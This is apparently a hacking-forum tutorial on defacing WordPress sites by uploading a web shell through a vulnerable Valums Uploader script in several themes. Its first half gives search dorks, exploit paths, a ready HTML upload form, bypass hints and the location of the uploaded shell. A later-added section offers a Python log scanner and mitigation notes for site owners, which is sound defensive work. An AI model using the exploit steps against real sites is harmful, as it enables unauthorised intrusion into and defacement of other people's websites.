Hi friends
Back again with me, Handsomeware. Of course my face is handsome :v
This time I want to share a tutorial on WordPress defacement through Valums Uploader shell upload
Let's get straight to it:
There are many dorks, but if you want vulnerable results, develop them further yourself
1. Dork: inurl:/wp-content/themes/nuance/
exploit:
/functions/jwpanel/scripts/valums_uploader/php.php
2. Dork: inurl:/wp-content/themes/lightspeed/
exploit:
/framework/_scripts/valums_uploader/php.php
3. Dork: inurl:/wp-content/themes/saico/
exploit:
/framework/_scripts/valums_uploader/php.php
Once you have a target, it is vulnerable if it shows the text {"error":"No files were uploaded.",
Then create the CSRF form, saved with a .html extension:
<form enctype="multipart/form-data"action=" http://target.com/wp-content/themes/eptonic/functions/jwpanel/scripts/valums_uploader/php.php" method="post"><input type="jpg" name="url" value="./" /><br />Please choose a file: <input name="qqfile" type="file" /><br /><input type="submit" value="upload" /></form>
Replace the text written in red with the target's theme exploit path
After that, upload the shell with a .php extension; if that doesn't work, go ahead and bypass it
Shell access path:
Target.com/wp-content/uploads/year/month/shellname.php
That's all, and thank you
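For site owners, the requests this tutorial generates are easy to spot in web server logs. The following is an added example, not part of the original post: it scans Combined Log Format lines for requests to the valums_uploader/php.php script and for script files served from /wp-content/uploads/. The sample log lines, IP addresses, dates and file names are constructed.

```python
import re
from collections import defaultdict
# Combined Log Format prefix: ip ident user [time] "METHOD path PROTO" status ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')
# The uploader script named on this page, under any theme directory.
UPLOADER_RE = re.compile(r'^/wp-content/themes/[^/]+/.*valums_uploader/php\.php$', re.I)
# Script files served from the media tree, where only static files belong.
UPLOADS_PHP_RE = re.compile(r'^/wp-content/uploads/.*\.(?:php\d?|phtml|phar)$', re.I)

def classify(line):
    """Return (ip, kind, path, status) for a suspicious request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = m['path'].split('?', 1)[0]  # ignore the query string
    if UPLOADER_RE.match(path):
        kind = 'uploader_post' if m['method'] == 'POST' else 'uploader_probe'
    elif UPLOADS_PHP_RE.match(path):
        kind = 'php_in_uploads'
    else:
        return None
    return m['ip'], kind, path, int(m['status'])

def triage(lines):
    """Group hits per client IP; flag a 200 uploader POST plus a 200 script under uploads."""
    per_ip = defaultdict(list)
    for line in lines:
        hit = classify(line)
        if hit:
            per_ip[hit[0]].append(hit[1:])
    report = {}
    for ip, hits in per_ip.items():
        posted = any(k == 'uploader_post' and s == 200 for k, _, s in hits)
        served = any(k == 'php_in_uploads' and s == 200 for k, _, s in hits)
        report[ip] = {'hits': hits, 'likely_compromise': posted and served}
    return report

# Constructed sample lines (documentation IP ranges, made-up file names).
T = '/wp-content/themes/nuance/functions/jwpanel/scripts/valums_uploader/php.php'
SAMPLE_LOG = [
    f'203.0.113.7 - - [12/May/2013:10:01:02 +0000] "GET {T} HTTP/1.1" 200 41 "-" "-"',
    f'203.0.113.7 - - [12/May/2013:10:02:10 +0000] "POST {T} HTTP/1.1" 200 18 "-" "-"',
    '203.0.113.7 - - [12/May/2013:10:02:40 +0000] "GET /wp-content/uploads/2013/05/a.php HTTP/1.1" 200 512 "-" "-"',
    '198.51.100.20 - - [12/May/2013:10:03:00 +0000] "GET /wp-content/uploads/2013/05/photo.jpg HTTP/1.1" 200 2048 "-" "-"',
    '198.51.100.9 - - [12/May/2013:10:04:00 +0000] "GET /wp-content/themes/saico/framework/_scripts/valums_uploader/php.php HTTP/1.1" 404 0 "-" "-"',
]

if __name__ == '__main__':
    print({ip: e['likely_compromise'] for ip, e in triage(SAMPLE_LOG).items()})
```

Removing the theme's uploader script and denying script execution under wp-content/uploads closes the path these log entries point to.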